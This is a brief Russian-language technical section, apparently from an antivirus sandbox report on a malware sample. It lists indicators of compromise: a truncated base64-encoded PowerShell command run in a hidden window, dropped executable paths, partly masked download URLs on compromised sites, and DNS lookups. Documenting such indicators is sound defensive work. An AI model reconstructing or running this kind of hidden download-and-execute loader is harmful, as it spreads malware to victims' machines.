Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABRAGcAbgB1AHoAawBxAD0AKAAnAFkAJwArACcAMgAnACsAKAAnAHIAdQBqAGUAJwArACcAYQAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAEUAUgBQAFIATwBGAEkATABlAFwASgBIA...
- %HOMEPATH%\jhaingg\e7pz5_w\t14gn0.exe
- %HOMEPATH%\jhaingg\e7pz5_w\t14gn0.exe
- http://sa###temsuk.com/index_files/j9b/
- http://va####ebuilders.com/wp-includes/OEyjc9x/
- http://pa###witch.com/wp-admin/CmubpSk/
- http://www.ek##mco.ir/english/fn/
- http://vo###teve.us/closed_zone/Bk/
- DNS ASK sa###temsuk.com
- DNS ASK ca##.#onukkad.com
- DNS ASK va####ebuilders.com
- DNS ASK ni###keji.com
- DNS ASK pa###witch.com
- DNS ASK ek##mco.ir
- DNS ASK vo###teve.us
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABRAGcAbgB1AHoAawBxAD0AKAAnAFkAJwArACcAMgAnACsAKAAnAHIAdQBqAGUAJwArACcAYQAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAEUAUgBQAFIATwBGAEkATABlAFwASgBIA...' (со скрытым окном)